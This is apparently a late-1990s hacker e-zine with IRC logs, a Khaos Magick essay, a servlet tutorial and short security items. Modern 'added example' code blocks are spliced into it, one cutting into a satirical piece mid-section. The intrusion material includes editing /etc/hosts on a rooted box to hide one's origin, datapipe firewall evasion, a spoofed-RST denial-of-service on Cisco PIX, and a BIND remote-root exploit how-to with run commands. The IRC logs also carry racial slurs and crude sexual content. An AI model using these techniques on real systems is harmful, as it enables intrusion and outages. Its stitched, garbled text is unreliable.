EDX=0076066f ES=0167 EDI=00000000 GS=0000

Gosh, EIP and EBP look a bit weird.

*Sigh* Just because texts up to now have not mentioned buffer overflow related problems with cin and ifstream doesn't mean they don't exist. In fact, I am willing to *bet* that the buffer overflows in WinAMP's reading of playlists and Netscape Navigator's reading of prefs.js were both caused by improper use of an ifstream. This is also a huge problem because *every* C++ course/tutorial tells programmers to use their ifstreams like that. Anyway, the real moral of the story - Fuck off and check your facts before you whine. ;-P

------

Some extracts from a recent e-mail to me from okby@b4b0.org which may be of interest to some hoez...

Indeed we are still putting out the ezine. Sorry, but we've been off for awhile, mainly due to real life problems in everyones schedule. Real life comes before internet. Anyhow, we're back in business, and we're stronger than ever. (ps. if you have anybody else you know that would be interested in submitting anything to the ezine please let them know that we'll look at anything especially if it has something about social antics or programming in it. thnx.)

------

Pneuma and I have decided to choose some completely arbitrary race to hate with a passion. We looked in an Atlas and found Andorra, a tiny little country between France and Spain with a population of about 2000, and decided that it would do well. Before we were completely unaware of the great threat of this nation, and now we have made the shocking discovery that They're everywhere! They're taking all our jobs! They're corrupting our way of life!
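Going back to the cin overflow a few paragraphs up: the fix the tutorials leave out is to tell the stream how big the array is before extracting into it, or to drop the fixed array altogether. The following is an added example, not code from the zine or from Wyzewun; it feeds the same fifteen 'A's through a constructed std::istringstream in place of std::cin, reads them into the same five-byte buffer bounded by std::setw(), and shows what stays in the stream instead of landing on the stack. The function and struct names are my own.

```cpp
// Added example (not from the zine): bounding "cin >> buf" so it cannot
// write past a fixed-size char array, beside the std::string form.
// Input comes from a constructed std::istringstream standing in for cin.
#include <cstddef>
#include <cstring>
#include <iomanip>
#include <iostream>
#include <sstream>
#include <string>

struct BoundedRead {
    std::size_t stored;    // characters written into the fixed buffer
    std::string leftover;  // what the next extraction still finds in the stream
};

// Same shape as the zine's gay.cpp, but std::setw(N) tells the stream the
// array size first, so operator>> stores at most N-1 characters plus the
// terminator; everything beyond that is left unread in the stream.
template <std::size_t N>
std::size_t readBounded(std::istream& in, char (&buf)[N]) {
    in >> std::setw(static_cast<int>(N)) >> buf;
    return std::strlen(buf);
}

// Drives readBounded() over one token and reports what it kept and what it
// left behind: the leftover is exactly what an unbounded "cin >> beer"
// would have written over the rest of the stack frame.
BoundedRead demoBounded(const std::string& input) {
    std::istringstream in(input);  // constructed sample input
    char beer[5];                  // the zine's five-byte buffer
    BoundedRead r;
    r.stored = readBounded(in, beer);
    in >> r.leftover;              // setw() is reset after one extraction
    return r;
}

// The idiomatic fix: no fixed buffer at all, std::string grows as needed.
std::string demoUnbounded(const std::string& input) {
    std::istringstream in(input);
    std::string s;
    in >> s;
    return s;
}

int main() {
    const std::string fifteen_as(15, 'A');  // the zine's "AAAAAAAAAAAAAAA"
    BoundedRead r = demoBounded(fifteen_as);
    std::cout << "setw(5) read stored " << r.stored << " chars, left \""
              << r.leftover << "\" in the stream\n";
    std::cout << "std::string read stored "
              << demoUnbounded(fifteen_as).size() << " chars\n";
    return 0;
}
```

Either form leaves gay.cpp's crash impossible: the setw() version truncates and keeps the remainder for the next extraction (so a caller must still check for unexpectedly long tokens), while the std::string version simply keeps everything. The same applies to ifstream, which the text blames for the playlist and prefs.js bugs, since it shares operator>> with cin.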
First of all - you must know how to identify Andorrans so as to be able to persecute them at every possible moment. We have decided that they all, without doubt, have hair growing out their ears. You can also always tell an Andorran by their nose. We don't know exactly what *about* it, but we are sure this identification technique is also completely infallible.

And boy oh boy, when an Andorran moves into your neighbourhood - you'll know about it! Your children will worship Satan, take drugs, and eat... starchy stuff! Things will go missing everywhere (The Andorrans are *born* thieves, they even steal their currency from France and Spain!) And we're not even going to *begin* talking about their SMELL!

So - join the fight against Andorra before it's too late! Besides - it's fun saying "Oh yeah, well at least (X Racial Group) aren't as bad as the fucking ANDORRANS!" and everyone always assumes that comments about Andorrans relate to *their* racial group - whatever that may be. Oh, and if you live in Andorra, please, please, e-mail us. ;-P

------

Interesting fact of the month, as found in issue four of b0g...

LONGEST PUBES
Maoni Vi of Cape Town has hair measuring 32 inches from the armpits and 28 inches from her minge.

Yeah! Gov-Boi's home town! Coincidence? I think not. ;-) Shjeesh, and ppl wonder why I keep on ripping off CT. :-P

------

Real-life quote of the month...

Marcel, it says in this magazine that men like being anally fingered during sex. How should I approach Steve about this?

------

Don't want your Java to run on Microsoft VM's? Then instead of using this...

public static void main(String[] args) {

Use THIS...

static void main(String[] args) {

And it will work in anything except M$-made stuff. ;-)

------****------

Byteware from Jus...

How to impress your lame linux buddies? If you haven't figured this one out yet, congratulations - I'm speechless.
'nix uses a file called /etc/hosts to identify known hosts for domain resolution, to prevent a full DNS lookup every time that host or IP is used, or if a DNS lookup isn't suitable for that IP. Usually this will contain something like localhost resolving to 127.0.0.1 and your machine's (static) IP and its hostname (obviously only if the machine has one).

/etc/hosts overrides DNS lookups, so you can play cute games with it on your machine. For example, change 127.0.0.1's resolution from "localhost" to "whitehouse.gov". Telnet 127.0.0.1, login and voila - do a "who" and see yourself logged in from the whitehouse :P

This can actually be very useful to hide your connections as many people will take what a "who" says at face value and not look any further into it - root a box, change your current IP's resolution in that machine's /etc/hosts to your enemy next door, and telnet in and you appear to be connected from idiot.hostname.com's machine... now there's a thought... Obviously you can't use this very seriously - if you're smart enough to get that far you will realise that a netstat -na will show otherwise :P

------

Got any annoying network firewall you wanna sneak around? Well, if you aren't a prize circus clown then you may have already discovered the beauty of some simple code known as datapipe (src on www.security.za.net). Your usual network firewall will have basic things open like http (80) and ftp (21) allowed out, but not your favorites like telnet (23), ssh (22) or irc (6667) - tsk, shame. Datapipe lets you setup a pipe for data coming in on one port to another port on another host - sounds interesting. You could run datapipe on a machine outside of your network to listen on port 80 or 21, and then pipe the connection to your irc server on port 6667, or even to the local machine's telnet or ssh port... gee, that was tough.
You could then /server externalmachine.com 21 or telnet externalmachine.com 80, and the network firewall will allow the outgoing data stream, but the external datapipe will change the flow of data to where you really want it to go - deranged.blabber.net (6667) for example :)

[Wyzewun: Yeh, BlabberNet is neat, pity about the gay IRCOps there though (Jus, Vortexia, TimeWiz) :P]

You will get datapipe, use it and like it. Duh.

------****------

Byteware from DvD...

In RedHat 6.0, users with uid 1000 or higher can execute 'shutdown -r now', which will cause the system to reboot and go into single-user mode. Oops.

__________________________________________________________________
_. Cellphone Unlocking without the Mastercode by Moe1 ._

This works on Nokia 21xx/31xx/51xx/81xx. This doesn't work on software version (5.04).

First of all your PIN code must be on, then press C, arrow down, C, and hold until it clears display then press * and hold until it starts to blink then press * again and hold until it starts to blink then type 04*YOURPIN*YOURPIN*YOURPIN#. It should then say "PIN code changed" or something and the SIM card is now accepted.

Note: Each time you turn your phone OFF it resets the lock, so this needs to be done each time you turn your phone ON.

__________________________________________________________________
_. Hacking Reality: An Introduction to Khaos Magick by Wyzewun ._

As a practicing Chaote, I was very interested to have recently seen two articles regarding occult issues in what would strictly be called H/P e-zines. The two e-zines I am referring to are b4b0 issue 9 and b0g issue 2, and the two schools covered being Khaos Magick and Satanism respectively. Both zines are available @ PSS should you be interested in checking them out some time.
(http://packetstorm.securify.com/mag)

So why did I see a need for another article on the subject? Well, Synner's article in b4b0, despite being quite good, left out a few very important points as to what Khaos Magick is all about. I will also try and throw as many of my personal opinions about Khaos Magick into this as possible, to make it interesting to people already familiar with the system. And ultimately, it's hard to summarize such a complex system in a single article - so read both anyway. ;-)

As for reading the article in b0g on Satanism... well... I have to be honest - I found the entire original content insipid and stupid but the passages quoted directly out of Anton LaVey's Satanic Bible make it worth reading anyway, despite the typos. Especially considering that LaVey was influenced by Aleister Crowley and HP Lovecraft as were many of the early Khaos Magicians like Austin Osman Spare. And more importantly, regardless of that article, b0g has to be one of the funniest zines the H/P community have produced ever.

Right. Now Let's get started...

The alt.magick.chaos FAQ contains a menagerie of definitions of Khaos Magick, and I suggest you read them all should you be interested. But the one I am going to give you in this article comes from Joseph Max.555, who I think defines it quite well...

  Chaos Magick is currently the cutting edge of modern Ceremonial Magick. It largely grew out of the work of Austin Osman Spare, though it has been fractalized into many forms over the last 10 or so years. Chaos Magick emphasizes a personal, experimental approach to magickal practice, de-emphasizes "traditional" approaches (ie. GD, OTO, et al) especially as regards "secret knowledge", male/female dichotomies and order hierarchy; what can be learned from Masters or Gurus is far less important or effective than what a dedicated researcher can discover for hirself.
  As such, shamanism is incorporated more directly than such historical approaches as Kaballa, though most Chaotes are quite adept at examining traditional systems, incorporating what works and discarding that which holds no personal appeal. Chaos Magicians look at Magick as being a _living_ art rather than an _antique_ one. They regard the various belief structures of magick as being the _means_ rather than the _end_, and the most adept can alter their belief-state as easily as they change clothes.

  Chaos Magick recognizes no particular system of theology as having any more "reality" than any other, and most Chaotes (like Jung) approach deities as being no more than archetypal constructs of the subconscious mind. Therefore they are far less concerned with having any (in their eyes) arbitrary moral system pounded into their skulls before getting to actually put magickal techniques into practical use than "Old Aeon" systems like the GD's or Abra-Melin. Chaos Magick propounds no particular dogma or moral system, beyond its most common identifier: "Nothing is True, and Everything is Permitted." I have yet to meet, however, any adept Chaos Magician who doesn't have a strong sense of personal ethics and subscribe to it fervently.

And in this one sees many of the points which Synner neglected to mention. But before even beginning to touch on those, I'm going to hop way back and give my personal definition of Magick in general for the benefit of those unfamiliar with such a concept beyond fairy-tale literature...

Magick is the art of bending reality to one's will for whatever reason be it personal or so-called "god sent". Magick *has* to exist simply because so many people in so many different places practice it. And even should Magick *not* exist, *because* so many people practice it, it *does*. Why? Because Magick exists. Confused? Good. I have succeeded in wasting your time. Now let's move on... ;-)

Now let's begin to look at approaches to Magick.
Up to the point where Khaos Magick stepped into the world, Magick was approached largely from a traditional viewpoint. This means that Magick has been performed in manners passed down over generations, the original method of which was probably obtained from some-one who had ingested something hallucinogenic, was mildly insane, or perhaps actually had a very strong affinity with the supernatural. Of course, to a Chaos Magician (referred to from here on as a Chaote), which one of these it was doesn't really matter in terms of effectiveness. :)

You see, most chaotes adopt Jung's concept of gods as archetypes of the subconscious mind. Thus the emphasis is not placed on *HOW* Magick should be performed, but on actually *MAKING* it happen. The Chaote acknowledges that an invocation to Homer Simpson can be just as effective and in some cases perhaps even more effective than one to a traditional deity. Also, which represents drunkenness better to you - Dionysus (ancient greek god of wine) or Barney from the Simpsons? I thought so. Now maybe you're whining that Barney isn't a "god", but to some extent, he IS, in that by you *thinking* of him as a god, he becomes so. Nothing needs to "exist" - it works anyway - which is why Chaos Magick is the only school to have Atheist magicians. :)

In Conclusion, I would like to recommend that anyone interested in learning more about Magick and particularly Khaos Magick, should read the work of the following people who have written stuff in these fields...

Psychology: Jung, Freud, Nietzsche
Occult: Peter Carroll, Austin Osman Spare, Anton LaVey, Aleister Crowley, Tzimon Yliaster, Phil Hine
Fiction: Isaac Asimov (Esp. "The Last Question"), HP Lovecraft, JRR Tolkien
Art and Theatre Movements: Surrealism, Constructivism, Dadaism, Absurdism, Existentialism, Expressionism

And also check out the following URL'z...
www.chaosmatrix.com
www.crl.com/~tzimon
www.occultsearch.com
www.chaosmagic.com
www.execpc.com/~discord/iot
ds.dial.pipex.com/specularium

Later this year, Pneuma and I will publish "Liber Tine" online, the book on our approach to Khaos Magick which we are writing. Until then, Cheers...

;, ,;;4, ,?;;$;,__________________________________________________________________,,7$; __... . . ...__ d$$^^ ^^$$b .?$; ;$$;:;, _. K-r4d 0h-Day Chr1stian1tY War3z fr0m Var10uz ._ ,;:;,, _.

We received divine inspiration from the following visitor to #5fm, who has bestowed upon us great wisdom which we shall cherish our entire life...

--- BEGIN LOG ---

* lee (lee@ABD7AD12.ipt.aol.com) has joined #5fm pn3um4, i h4ck3d n4s4 hello any christians out there??? helllloooooooo lee: I just ate them all, maybe tommorow :P lol keep religion out of this channel çîŕ€h mî héw çé hŕ€k BiNg_: YEAH!! huh? lee: I told you already, I Ate them all, try tommorow! no, GOD is everywhere!!!!!!!!!!!!!!!!!! pneuma, t34ch m3 h0w t0 h4ck!! ? Ok, enuff about religion b4 I make u cry what is wrong with you, why cry??? lee : go away to #god or something i worship Pneuma he is my gof he is my god never heard of him Opium: thats understandable i worship money shaim money................. * Pneuma is the god of good sex, beer, and evil computer trix lee : ja ... so leave. i dont bow down before anyone well, some day, when GOD comes, EVERYBODY will bow to me can you prove that bible oh yeah lee : GET THE HINT? # god JESUS MOWS MY LAWN!!!!!!!!!!!!! be carefull what you say!!!!!!!!!!!!!!!!!!!!!!! lee : or what? well, tonight i will pray for you and someday your'e eyes will open aaaaaaaaaaaaaaaaaaaaaaaahhhhhhhhhhhhhhhhhhhhhhhhhaaaaaaaaaaaaaaaaaaahh MY EEEEEEEEYYYYYEEEEEEEEEESS I'M BLIND Lee : yeah whatever...the aliens built us, or sum such shit why should i trust someone who took away to of my closest friends and then when i ask someone they say "god works in mysterious ways" BiNg_: yeah...explain that..
well, stop being stupid, you know the truth but you are to proud to admit it, why can't you just chat, that is all i want BOOM, (it's the voice of G.O.D) lee: *lick* Lee : isnt it prayer time or sumthing? are all of you from sa Yes, and proud of it, Better than being a dumb hippie american :P YAAAAAAAAAAAAAAAAAAAWN lee: WHO CARES? { sumbody plz kick him!!} i care also safrican who says it's a him religion is the world's best practical joke lee, are u gay? HEH! no, i am straight and i am a girl oh opium, wanna chat. nah --- END LOG --- So, inspired by the light of Jesus, we decided to 'grep -i' all our IRC logs for 'jesus' and 'christ' - the results of which looked something to the effect of this... In #b4b0 ... cause like christians are against alternate life styles * Topic is 'Let's party like we were at a christian suicide.' jesus christ. jesus h fucking christ jesus christ JESUS CHRIST jesus chr1st. jesus be in heaven I'm so sick of jesus jesus jesus jesus du0d jesus. jesus thats a stupid ploy. In #ch4x ... at a fucking club for christ's sake jesus jesus fuck In Blabber.Net's #hack ... christ Blu_J: CHRIST christ christ almighty hey christ man christ christ all fucking mighty christ.. i mean CHRIST! hmmm... all i want for christmas is my little cray, my little cray GEZUZ FUCKING CHRIST SUPERSTAR my oath to christ christ i wonder how fuqn ugly she was to go for someone lookin like u HOLY CHRIST Sega Dreamcast has 24mb ram!!!!!! for christ sake christ vort ;P teach some people here how tcp/ip works jus :P christ i use fbsd. christ everyone shutup christ i wonder whats going on. christ (: i know ipv4 better than the people who designed it. christ i am smurfing myself now. dood you are as pissed as a coloured on christmas eve jesus christ ack! christians! christ :P * opium was kicked by hotmetal (YOU DO NOT RUN NAMED FOR CHRISTS SAKE) christ jesus christ netscape is a piece of shit. 
jesus christ wget christ christ christ what a lame topic * Topic is 'Vortexia looks like Jesus' UglyKidJoe: jesus bru at least upgrade to OSR2. jesus c/s: 48867? jesus!@# jesus my modem cant do that Vortexia: hey wanker jesus wannabe jesus holy jesus jesus jesus, 40 sectors bad jesus jesus jesus christ JESUS CHRUST jesus d00ds, so god damn what if we like the bible!!! jesusfuck jesus I'm still rushing In #HWA.hax0r.news ... <_655321_> fucking christ man Told you all Christians were insane :P oh christ christ christ, it wasnt that good christ oh jesus In #Legions ... !fuck Christina Aguilera ahh k, I should start some Christianity questions (hopefully that statement did not offend anyone) Zao == Christian hardcore christianity scares me it's Christian hardcore * techn1cs has quit IRC (he dreamed a god up and called it christianity) christ redhat labs droped 3 1/4. christ almighty. christian rock sucks i dont care if you were jesus fucking christ. but don't use Christ's name in vain christian music blows christian, muslim, buddah, jehova.... all the same christ * Becky- has quit IRC (Jesus may love you, but everyone else thinks you're an asshole.) jesus, people upstairz fuqn sound like they r fuqn killing people by hitting them with baseball bats #Jesus unable to rejoin channel (you're banned!) they do not LIKE JESUS I am in JESUS CHAN * shekk is now known as fukJesuS * fukJesuS is now known as jesusblow hehe Nt im opped in #jesus why is it they do not talk about Jesus in #jesus I bet you I could make them talk about Jesus ;P y0 man, i had dis mad dream dat i had anal sex0r with jesus, what do u think it meanz? i never knew jesus was a nigger jesus jesus jesus oh jesus In the (now deceased) #zahack on EFNet ... christ i am pissed off. christ. and how when it was my turn, santa (satan if you concentrate real hard) asked me what i wanted for christmas, and i replied with a big stupid-ass smile, 'A BEAVER!' 
jesus christ, have u no shame geeezus christ geeezus christ if this is the way my friends repay me for what I do for christ sake what did i miss now. PhreakAZD yes, I believe in God, I am a Christian, though I do not follow organized religion, my Christianity is derived from how I perceieve the bible, not how others do jesus don't start that ? crap again jesus the chances of the sequencing being right must be one in a million jesus jesus JESUS! jesus JEsus chrsist i hate this town jesus u got a bigg rectum jesus jesus jesus man hahahahahaha jesus what a wanker jesus ignore this guy jesus jesus jesus jesus jesus jesus man vortexia, opium told me you look like jesus, now im thinking all weird of you vortexia, yeah, he's right, you're jesus

And THAT, ladies and gentlemen, was the international hacking scene's contribution to the institution of Christianity. We hope you enjoyed it, and if you didn't - We don't care. Just leave us alone for Christ's sake. ;-P

;, ,;;4, ,?;;$;,__________________________________________________________________,,7$; __... . . ...__ d$$^^ ^^$$b .?$; ;$$;:;, _. Cisco PIX Denial of Service by Vortexia ._ ,;:;,, _.

Hi All, just a bit of a security notification. Cisco has been informed of this problem and I'm waiting for a fix for the problem; I've also noted that various other firewalls are affected by this code, though if you want to know if whatever you are running is affected, you will have to test it.

A brief rundown of the problem. If you run routable IPs on your internal interface on your PIX, and routable IPs on your external interface, so the PIX is not running NAT, the PIX keeps a state table of everything going on. Anything that is not in your state table that attempts to come in from the outside is denied, even if there is a conduit in place to permit anything. Which means that you have to establish a connection from your internal network to your external network before anything external can send data back.

This is a really nice feature; unfortunately there is a bit of a bug that I found in this. While testing in-house equipment for possible flaws, as we continually test various products, I found the following.

On receiving a RST packet (TCP Reset) from a given host with the correct source and destination port, the PIX will drop the state entry for that particular connection, which means the TCP connection dies, due to the fact that with no state entry the external box can no longer talk to the internal box.

So, if we take a standard raw IP packet, give it a TCP header, set the source IP as a machine that your internal box is connected to and the destination IP as your internal machine, set the source port on the spoofed IP as the port the person is connected to, set your destination port on your destination IP cyclically to possible source ports on his side, and send resets, it will drop the person's state table entry, cutting him off from the box he is connected to.

Now, the one question I asked when I wrote this is why does this work, why is there no seq/ack checking on RST packets? This was answered in the TCP RFC, saying that seq/ack numbers are not checked on RST packets; however they are checked on FIN packets, hence using FIN packets for this test is futile without sequence prediction code.

There is a simple workaround for this problem however, and anyone wishing to know the details of that is free to email me at andrew@cnsec.co.za for details. Below I have posted example code to show the exploit and how it works, and hopefully this will be useful to someone on this list and help fix a fairly nasty denial of service problem.

Many Thanks
Andrew Alston
Citec Network Securities (Director)
Phone: (011) 787 4241
Fax: (011) 787 4259
Email: andrew@cnsec.co.za

[Ed: Exploit code can be found in ./kodez/CiscoPIX]

;, ,;;4, ,?;;$;,__________________________________________________________________,,7$; __... . . ...__ d$$^^ ^^$$b .?$; ;$$;:;, _.
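The state-table behaviour the advisory above describes, modelled as an added example: this is written for this page, it is neither Cisco's code nor the author's ./kodez/CiscoPIX exploit, and every address, port and sequence number in it is made up. A stateful firewall keyed on the inbound 4-tuple either deletes the entry on any matching RST, as the PIX did, or first checks that the RST's sequence number lies inside the receive window, which is what RFC 793 section 3.4 actually requires of a TCP receiver. The blind source-port sweep from the advisory kills the connection in the first case and achieves nothing in the second; an in-window RST still resets, so the check raises the attacker's cost (about 2^32 / window guesses per port) rather than removing it. RFC 5961 goes further (only an exact RCV.NXT match resets, anything else in-window draws a challenge ACK) and is not modelled here.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Flow:
    """Inbound 4-tuple as the firewall sees it: external peer -> internal host."""
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int

@dataclass
class Window:
    """What the inside host will accept next from this peer (tracked per entry)."""
    rcv_nxt: int   # next sequence number expected from the peer
    rcv_wnd: int   # receive window the inside host advertised

class StateTable:
    """Connections the inside opened; inbound segments are forwarded only when they match."""

    def __init__(self, validate_rst_seq):
        # False: the behaviour the advisory describes, any RST matching the 4-tuple kills
        # the entry. True: RFC 793 s3.4, a RST is honoured only if its SEQ is in the window.
        self.validate_rst_seq = validate_rst_seq
        self.entries = {}

    def open_outbound(self, internal_ip, internal_port, peer_ip, peer_port, rcv_nxt, rcv_wnd=65535):
        """The inside host opened a connection; remember the inbound (reverse) 4-tuple."""
        flow = Flow(peer_ip, peer_port, internal_ip, internal_port)
        self.entries[flow] = Window(rcv_nxt, rcv_wnd)
        return flow

    def inbound(self, flow, seq, rst=False):
        """Return True if an inbound segment is forwarded to the inside host."""
        win = self.entries.get(flow)
        if win is None:
            return False                 # no state: dropped even if a conduit permits the port
        if rst:
            # Toy arithmetic: 32-bit sequence wrap-around is not handled here.
            in_window = win.rcv_nxt <= seq < win.rcv_nxt + win.rcv_wnd
            if self.validate_rst_seq and not in_window:
                return False             # out-of-window reset ignored, state kept
            del self.entries[flow]       # connection torn down
        return True

def rst_sweep(table, victim_ip, peer_ip, peer_port, port_range, seq=0):
    """The attack from the advisory: spoof RSTs from peer_ip:peer_port to every candidate
    client port on the victim with a guessed sequence number. Returns entries destroyed."""
    before = len(table.entries)
    for client_port in port_range:
        table.inbound(Flow(peer_ip, peer_port, victim_ip, client_port), seq, rst=True)
    return before - len(table.entries)

def demo():
    """Hypothetical scenario: inside host 10.1.1.5:40123 has an SSH session to 192.0.2.10:22."""
    victim, peer, peer_port, client_port = "10.1.1.5", "192.0.2.10", 22, 40123
    rcv_nxt = 0x7A3B1C00             # unknown to the attacker
    sweep = range(32768, 61001)      # ephemeral source ports to cycle through

    naive = StateTable(validate_rst_seq=False)
    naive.open_outbound(victim, client_port, peer, peer_port, rcv_nxt)
    strict = StateTable(validate_rst_seq=True)
    flow = strict.open_outbound(victim, client_port, peer, peer_port, rcv_nxt)

    return {
        "unchecked_sweep_killed": rst_sweep(naive, victim, peer, peer_port, sweep, seq=0),
        "checked_sweep_killed": rst_sweep(strict, victim, peer, peer_port, sweep, seq=0),
        # A RST that does land in the window still resets: the check makes the
        # blind sweep fail, it does not make spoofed RSTs harmless.
        "checked_in_window_killed": int(strict.inbound(flow, seq=rcv_nxt + 10, rst=True)),
    }

if __name__ == "__main__":
    print(demo())   # {'unchecked_sweep_killed': 1, 'checked_sweep_killed': 0, 'checked_in_window_killed': 1}
```

The same model also shows why the advisory's FIN variant needs sequence prediction: a FIN is ordinary in-sequence data and only means something at RCV.NXT, whereas an unvalidated RST is accepted anywhere.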
An Introduction to Java Servlets by Wyzewun ._ ,;:;,, _.

Java Servlets are an extremely powerful server-side CGI replacement supported by most major web servers, and used by very few admins - most notably because they either don't know they exist or don't have the skill needed to write them. Java Servlets have several advantages over Perl and other traditional CGI languages in that they are faster to write and to run (a servlet is loaded once and lives inside the server's JVM instead of being forked as a new process for every request), more secure, and have all the advantages of the extremely well furnished Java Servlet API.

In this tutorial I will teach you how to write simple Java servlets. Although a knowledge of the Java language is not *completely* necessary to understand this, it will certainly help. What you *will* need is a basic knowledge of the HTTP protocol, of HTML, and of any object-oriented programming language. With that said - let's get going...

Servlets are written like normal programs except that the class extends the superclass HttpServlet. We just override the methods doGet(), doPost(), doPut(), doDelete() and doTrace() - which HTTP request each one handles is kinda obvious. =) Right, let's code a simple servlet quick...

    import java.io.*;             // PrintWriter and IOException
    import javax.servlet.*;       // ServletException and the servlet base classes
    import javax.servlet.http.*;  // HttpServlet, HttpServletRequest, HttpServletResponse

    // Here we declare the class and make it extend the HttpServlet superclass.
    // It must be public so the servlet container can load it.
    public class SimpleExample extends HttpServlet {

        /* This overrides doGet() and receives the user's request (called "req"
           in this example) and the servlet's response (called "res" here).
           doGet() is declared protected in HttpServlet, so the override may not
           be less visible than that, and both exceptions are part of the
           inherited signature. */
        protected void doGet(HttpServletRequest req, HttpServletResponse res)
                throws ServletException, IOException {

            // Set the HTTP Content-Type (before anything is written to the client)
            res.setContentType("text/html");

            // Get communicating with the luser
            PrintWriter out = res.getWriter();

            // Send HTML
            out.println("<html><head><title>Servlet Output</title></head><body>"
                      + "<h1>FUQ J0O!@#$</h1></body></html>");

            // Close the stream
            out.close();
        } // end of doGet()
    } // end of SimpleExample

OK, this issue is being released tomorrow, and a chiq friend of mine bought me a bottle of champagne and a condom for my birthday, so I gotta be honest - I don't have time to finish this article. :) Will make a sequel in future issues if I think anybody cares enough. Cheers...

;, ,;;4, ,?;;$;,__________________________________________________________________,,7$; __... . . ...__ d$$^^ ^^$$b .?$; ;$$;:;, _. Fixing M-Web Specific Modems by JungleG ._ ,;:;,, _.

I don't know anything about what I'm about to tell you - I haven't tried it myself. I don't own any Mweb modems, nor do I condone doing this. If you ever try to turn this against me, in any way, I cannot be held responsible and you must pay me 100 million Rand.

So, you're sitting there one day and this advert comes on the TV telling you that you can buy a Mweb Net-Getter (sp?) modem for R99. Great you think, this is awesome, I can get myself a 56K modem for only R99, right? Wrong. The Mweb Net-Getter modems are Mweb specific, ie. they only work when you dial into an Mweb POP. Until now. Here's what you do:

1) Find yourself an EPROM writer. Most universities and some security companies have them too.
2) Go to your favourite electronics supplier and buy a 27C2000 EPROM chip.
3) Find a friend / uncle / relative / boss / etc who has a Fastlink V.90 modem.
4) Open the Fastlink up, remove the EPROM and copy the EPROM from the Fastlink onto your newly bought 27C2000 EPROM.
5) Close the Fastlink modem up and return it.
6) Open the Mweb modem up and replace the existing EPROM with the newly bought and programmed 27C2000 EPROM.
7) Close the Mweb modem.
8) Plug and Pray.
9) There is no 9 .. I thought 9 looked good though.

Easy as that, you now have a 56K V.90 modem for R99.

Jungle G

;, ,;;4, ,?;;$;,__________________________________________________________________,,7$; __... . . ...__ d$$^^ ^^$$b .?$; ;$$;:;, _.
Miscellaneous IRC Gayness ._ ,;:;,, _. heh you a girl? nah, not right now, why? uh somehow that answer strikes me as awkward. hi there lo do u know Back Orifice? never met him It's not a him, it's a program oh ok what is a .tar file? [Ed: She's a #hack netslut - but I s'pose you figured that out already :P] [Ed: More #hack netsluttery...] vans kissing my tits. r u jealous? lol no ive hax0red everyb0dy and now im dealing in pr0n instead đ acid is back!!!!!!!! with PIZZA!!!!!!!!!!!!!!!!!!!! _(@^#^#_!@!@# yay pizza pizza pizza pizza woo hoo omg im gonna order pizza đ jus awaits his pizza [Ed: Cretins :P] if u get someone elses dial up account do u pay telkom? đ GreekGod is pretty good, thnx oh, good do u spit or swallow? excuse me? oh, sorry, wrong window damn right! lol no, only if its really soft wtf! wrong window again! it keeps popping up uhm, just a matter of interest What are you talking about? no, thats too ruff! slower dammit, why does this keep coming? fuck, you are a sick person why the hell does this come in the middle of my conversations? Ugly ... im 17 , hacker dude in training so to speak hacker in training ? this sounds so lame got my good fair share for being spooked the other day pinged www.fbi.gov wow u are so l33t i got to log this port tampering email was send to my isp geez I didnt even connect dumb assies got a warning dumb shit :P some crap about the american embasy being in pretoria and me not being imune to fbi yak yak yak :P hehe harper the unopped ;) hehe *** Harper was kicked by Pneuma (Opped) [Ed: #Darknet elitez...] wtf is gay-boi, he has my STDs!!! rave- : yo there ? shur rave- : can u give me some hints to break in a Apache/1.3.3 (Unix) Debian/GNU on Linux ? [Ed: Have I mentioned how cool #Darknet is, btw?] sup rave send a brotha some more passwd fles [Ed: And while we're at it, have ya seen NXT-Howto.txt by E-Mind of #Darknet?] Section A - What is a DNS? 
--------------------------

A DNS - Domain Name Server - is used to convert host names to IP addresses and IP addresses to host names. For example: www.infoseek.com = 204.162.96.173

2. What is the theory behind the exploit?

The exploit uses a buffer overflow in BIND versions 8.2 - 8.2.2 to gain a remote root shell.

6. How do I compile the exploit?

As always:

    $ gcc t666.c -o t666
    $

7. How do I run the exploit?

    $ su
    Password:
    # ./t666 1

Section D - Who should be credited for this HowTo?
--------------------------------------------------

1. Who is the person that motivated me into writing this?

That person is none other than gov-boi, he operates the great site www.hack.co.za. Without him, this How-To would never have been written! Thanks Gov-Boi :)

[Ed: Needless to say, #darknet are super-fuqn-skilled-kick-yo-azz-hax0rz]

;, ,;;4, ,?;;$;,__________________________________________________________________,,7$; ________,,,........... .........______ $$$$$$$$$˝˝˝˝˝˝˝^^^^^ '''''"""???zz. $$ ^?$$$ `?; $$ '$$ There is no more, you fucking sheep-shagger!@#$%^ $;$$$ ?; ,,?;I$$$ ,"________________________________________________________..,,##˝˝˝', $$ _.+ +.,; k-r4d 0h-d4y ju4r3z d1ztrh03z...

www.mdma.za.net/fk
packetstorm.securify.com/mag/fk

Send article submissions, hate mail, pictures of your butt, or whatever to wizdumb@leet.org and/or pneuma@mdma.za.net

For automatic delivery of FK to your mailbox as it comes out, subscribe to our mailing list by sending mail to minimalist@security.za.net with "subscribe fk" in the subject of the message. Propz to Jus for setting this up for us, and propz to Mogel of scene.textfiles.com for recommending it.

< K-Leet Tail Ascii Goez Here - DOH! >

NOW I'M GOING TO PENETRATE YOUR ARSEHOLE AS IF IT WERE POLAND !@#$%^&

@HWA

294.0 [b0f] Lamagra's "roothat" hacker wargames, hack legally!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Site: http://roothat.labs.pulltheplug.com

Full details at site, some below.
Here's a chance to enter a true hacker challenge: break the levels to get to level 8, the supreme master, and don't worry about the ph3dz knocking on yer door! - Ed

Games

I've been working on some holes for this box and I came up with 7 neat levels. They each deal with a different topic of exploitation. Each level is more difficult than the previous one. The simplest hole is "difficulty" 2; difficulty 0-1 would be a basic argument stack overflow. Every hole is wrapped inside a program that actually has some purpose. The source can be gotten by doing something special with the program. The source will then be printed to stderr (a simple ./program 2> file.c would save it, be sure to remove it quickly).

This all sounds pretty big, impressive and really hard, that's why I set up a hintserver to help you with every level. Its source code can be gotten here. It has a small bug in it to get you into level1. The hintserver is running on the port of the old rsh.

There are breakpoints after level1, level2 and level5. Each of these levels starts a new group and has its own homedir, webpage and password. Inside these groups it's possible to skip a level until later on, BUT to obtain the password of the next group, you have to send in all exploit sources (of all levels in the group) (to lamagra@digibel.org subject: roothat:level:nickname). You can keep your level inside a group with backdoors (cracked backdoors (by me) will be deleted).

Game-Rules

